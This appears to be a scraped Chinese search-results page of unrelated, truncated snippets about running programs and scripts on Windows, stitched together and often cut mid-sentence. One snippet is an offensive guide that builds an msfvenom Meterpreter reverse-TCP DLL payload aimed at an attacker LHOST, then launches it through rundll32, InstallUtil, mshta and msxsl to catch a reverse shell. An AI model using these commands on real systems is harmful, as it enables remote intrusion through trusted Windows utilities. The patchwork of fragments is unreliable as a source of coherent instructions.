文章来源|MS08067蓝队手册 本文作者:16涡轮风油呔 前言 在Windows系统上可以找到的许多证据,可以重建时间线,展示谁在何时何地运行了哪些应用程序以及如何从中提取有意义的数据。...内存取证不在这里的讨论范围,我们主要关注可执行文件运行的的证据 链接文件 链接文件是Windows操作系统中的一种快捷方式文件,用于快速访问指向的文件。...系统资源监视器 平常我们经常使用任务管理器查看正在运行的应用程序,而任务管理器只显示了系统资源监视器(SRUM)数据库存储数据中的一小部分,该数据库在Windows8中引入,用于跟踪资源使用情况。...在运行过程中,Windows会暂时将这些数据存储在HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SRUM\Extensions中,并在关机时写入SRUDB.dat...最后会生成一个名为SRUM_DUMP_OUTPUT.xlsx的输出文件,该文件包含可执行文件、运行该可执行文件的SID、日期时间、网络使用情况以及大量其他与资源相关的信息。
window环境下,通过DOS命令模式,调用bat脚本,执行jar包。可以正常打印jar包中的日志都指定日志文件。 通过tomcat部署的某服务去调用时出现不可调用,也不打印日志问题。...分两步来确定问题: 1、参数是否传递给bat脚本; 2、bat脚本中的java -jar 是否正常执行了; 问题1通过,在bat脚本入口处增加 echo name:%1 age:%2 >> test.log
最近需要开始开启一个go语言写的项目,项目开启需要使用make指令,但在windows上需要配置一些东西....使用make指令在windows上推荐安装mingw 官网下载 https://osdn.net/projects/mingw/releases/ 点击下载,下载后直接安装, 安装目录选默认的...在minggw的bin目录里将 很关键的一步 到此 make的指令就能在windows使用了 mingw32-make.exe 复制一份修改为 make.exe
@echo off chcp 65001 :: 配置远程服务器地址和用户名 set server=xxxxxx set username=xxxxxx :: SSH 密码 set password=xxxxxx...:: 配置远程服务器 git 仓库的路径 set repo_path=/home/xxxxx/Desktop/net/ :: 提示输入 Git commit 消息 set /p commit_message...回车默认使用当前时间): :: 设置默认 Git commit 消息 if "%commit_message%"=="" ( set commit_message=%date% ) :: 连接到远程服务器并执行
releases.html 3.解压后进入 conf 目录复制 zoo_sample.cfg 并重命名为 zoo.cfg 4.编辑 zoo.cfg 的 dataDir 配置,修改为你想存放数据的目录 5.进入 bin 目录,执行
近日,一个Windows DNS服务器远程代码执行漏洞曝光,Windows DNS(Domain Name System)服务器处理请求时存在缺陷,从而导致存在远程执行代码漏洞。...远程且未经授权的攻击者通过向 Windows DNS 服务端发送精心构造的恶意请求,即能以本地系统账户权限执行任意代码。...Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for 64-based Systems Windows 10...-based Systems Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server...2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server
在Windows 系统下安装好Pyton后,直接在CMD命令提示符号里 输入CD .py的文件路径, 进入.py文件的所在目录,例如 cd c:\python33\study,进入这个目录后 输入 Python....py文件名 回车就执行了.py文件。
Windows Terminal 是通过 Windows 应用商店来进行安装的。...因为使用的是 Windows 的应用商店,你也可以直接使用应用商店来进行安装。...应用商店的地址为: Get Windows Terminal - Microsoft Store 你可以从应用商店上面的链接来进行安装和运行。 当你完成安装后,将会显示运行,你可以直接双击来运行。...或者你可以在 Windows 的界面中,单击搜索,在搜索框中输入 terminal,通常在最上面就是你安装好的 Windows Terminal。...https://www.ossez.com/t/windows-terminal/13480
背景 ---- 在windows下运行android CTS的文章, 在网上找了一圈, 发现都是老版本的, 而且官方也明确说了, 不支持在window上运行. ---- Caution: CTS currently...CTS will not work on Windows OS. 不支持在windows上运行 本篇文章提供2个可以用的方法. ---- 2....了解运行原理 ---- 首先分析下载好的文件8.1的zip包里面的cts-tradefed这个文件, 这个直接用文本工具打开即可....这里看注释就好了, 第一个是检查系统版本的, 很显然, 官方也没有撒谎, 就是没有windows或者NT的字眼, 我就是不支持windows, 第二个就是检查android的编译环境, 这个就是设置CTS...因为CTS官方是不支持windows的, 但是VTS 是可以在windows上运行的. 因此只需要修改VTS为CTS即可. ps, 这 2 个脚本都上传到github了, 有需要的自取.
win32event.SetEvent(self.hWaitStop) def SvcDoRun(self): #你需要运行的代码# while True:...': win32serviceutil.HandleCommandLine(SmallestPythonService) 启动的方法就是直接在cmd下,脚本名.py install ,然后去windows...否则在启动服务时会出现“ Windows 不能 在本地计算机 启动 The smallest possible Python Service .....“的错误信息
【code】 #encoding: utf-8 #author: walker #date: 2019-05-24 #summary: 简单的 http server,用于测试后台运行 import ...), Handler) as httpd: print("serving at port %d" % PORT, flush=True) httpd.serve_forever() 【运行方式
Windows 定时执行脚本 1、参考资料 windows设置定时执行脚本 2、解决办法 由于Windows系统,无法使用Linux下强大的crontab命令,所以该定时任务也是针对Windo系统的...具体操作步骤 右击【我的电脑】,选择【管理】 在【任务计划程序】面板中点击【创建基本任务】 输入任务的【名称】和【描述】 当然是希望每天自动执行防疫打卡啦~ 设置每天执行任务的时间...,以及每隔几天执行一次该任务 选择【启动程序】 选择启动程序的 startup.bat 文件(本质上就是通过 java -jar 命令启动 java 程序) 确认设置无误后,点击...【完成】 添加完成后,可以在【任务计划程序】面板中查看定时任务是否设定成功 然后在指定的时间静静等待小黑窗出现即可 遇到的问题 之前执行 jar 包用的是相对路径,会出现如下错误
Windows PowerShell运行hexo命令 前言 一个月前更新了Windows11,在桌面右键可以直接开启 Windows PowerShell 便在安装 git 时没有选择在右键快捷打开的配置...,便有了这篇水文 在新系统上装了hexo环境,可打开系统默认的 Windows PowerShell 运行命令却无法识别,以为是系统环境变量没设置好。...可在 Git bash 和 CMD 终端却可以执行,再仔细看 Windows PowerShell 中的提示,原来是提示的无法加载文件,因此在此系统上禁止运行脚本。...错误示例 安装好 npm 和 hexo 后,在 Windows PowerShell 终端运行 npm version 没问题,运行 hexo version 则提示如下: hexo : 无法加载文件...所在位置 行:1 字符: 1 此时,在 CMD 中执行以上命令都没问题,所以不是系统环境变量的问题。
问题:build完python代码,只输出:[Finished in 0.2s] 分析:操作回忆:开始是可以看到运行结果的,后来在Tools>>Build with 选择了“Syntax Check”,
该工具改变了用户从非特权控制台会话(unelevated console session)直接执行特权命令的方式。Sudo for Windows 提供了一种直观、熟悉的解决方案。...用户也可以通过在特权控制台会话中执行以下命令来启用: sudo config --enable Sudo for Windows 支持 3 种配置选项,每个选项有不同的用途...: 打开新窗口(forceNewWindow):打开一个新的特权控制台窗口来执行命令。...以下是示例场景: “打开新窗口”配置:运行sudo netstat -ab 命令会打开一个新的特权控制台窗口,并在其中执行这条命令。 “关闭输入”配置:在当前窗口中运行特权进程,stdin 关闭。...用户可以通过在控制台中运行sudo -h来查看 sudo 命令的可选参数。 在“打开新窗口”配置中,sudo.exe 会启动一个新的特权控制台窗口,并镜像当前窗口的目录和环境变量。
文章目录 windows程序内部运行机制 窗口与句柄 消息与队列 想知道WM_XXX消息对应的具体数值?...&类型&实例 变量命名规范: 前缀_符号类型: Microsoft MFC宏命名规范: 库标识符命名法: 静态库版本命名规范: 动态连接库命名规范: windows程序内部运行机制 学习程序运行机制,为学习...在windows平台下面也有类似的库函数,但这是windows操作系统提供的。 所有主要的windows函数都在Windows.h头文件进行了声明。 这些api不可能都记住。...第一个参数 hInstance 表示该程序当前运行的实例的句柄,这是一个数值。当程序在 Windows 下运行时,它唯一标识运行中的实例(注意,只有运行中的程序实例,才有实例句柄)。...一个应用程序可以运行多个实例,每运行一个实例,系统都会给该实例分配一个句柄值,并通过 hInstance 参数传递给 WinMain 函数。
如何使用任务管理器检查 Windows 正常运行时间 任务管理器是用于检查正在运行的进程和服务及其详细信息的工具。还可以找到有关资源利用率的详细信息,例如运行时的内存和 CPU 使用情况。...这也是 Windows 用户查找计算机正常运行时间的一种快速且首选的方式。 打开任务管理器,点击性能,点击cpu,就可以看到“正常运行时间”了。 上图显示计算机开机已经3天11小时了。...使用命令行检查计算机正常运行时间 还可以使用命令行选项查看 Windows 正常运行时间。下面使用wmic和systeminfo两个命令来查看windows正常运行时间。 A....执行以下命令检查结果: > (Get-Date) - (gcim Win32_OperatingSystem).LastBootUpTime Days : 3 Hours...) Minutes" The Windows Uptime is : 3 Days, 11 Hours and 46 Minutes 总结 在本教程中学习了检查 Windows 正常运行时间的各种方法
-p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll >xxx.dll 目标执行 rundll32.exe shell32...\v10.0A\bin\NETFX 4.8 Tools\x64\key.snk" xxx.cs 2.靶机上运行: InstallUtil.exe /U xxx.exe 3.msf监听,得到反弹的shell.../x64/meterpreter/reverse_tcp set lhost xx.xx.xx.xx set lport 4444 exploit 运行 C:\Windows\Microsoft.NET...Microsoft HTML 应用程序 (HTA) 的实用程序,攻击者可以使用 mshta.exe 通过受信任的 Windows 实用程序代理执行恶意代码 use exploit/windows/misc...\desktop\CPIApplet.cpl 执行命令 通过msxsl.exe调用恶意xml文件执行脚本 制作两个文件 customers.xml <?
用途:针对frp.ngrok要在cmd下后台运行才行,每次打开是不是很麻烦?...编写脚本开机自启动方便吧~~ 一、步骤:编写.cmd脚本,将要执行的命令给写成cmd命令,在此以frp为例: 新建一个frp.cmd,内容如下: e: cd E:\桌面\frp frpc.exe -c...frpc.ini 说明:就是找到你的frp运行目录,一定要使用绝对路径,否则后面执行不成功。...三、将这个frpht.vbs运行一次,你会发现什么都没有弹出,不要慌~任务管理器查看是否有frp.exe这个进程即可。 说明:如果有的话就后台运行成功了。...四、设置开机自启动 打开目录C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp,拷贝frpht.vbs即可。
//cygwin.com/install.html 下载到Windows系统后,双击进行安装 ?...询问是否以服务的方式安装sshd,输入yes 输入守护进程的值来运行Cygwin,直接回车 ? 创建cyg_server用户账号和密码 ?...6、配置密钥方式登录 在Windows终端查看当前的用户名 ? 终端执行ssh-copy-id发送本机的公钥到Windows服务器 ?...最后在防火墙配置添加入站规则端口例外或者关闭防火墙 8、测试连接使用 在Linux上执行ssh免密钥登录 ? 一条命令执行想要的命令(中文乱码暂不处理) ?...至此,Linux免密钥方式通过ssh远程执行Windows cmd命令完成,开始使用吧
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
云直播
对象存储
腾讯会议
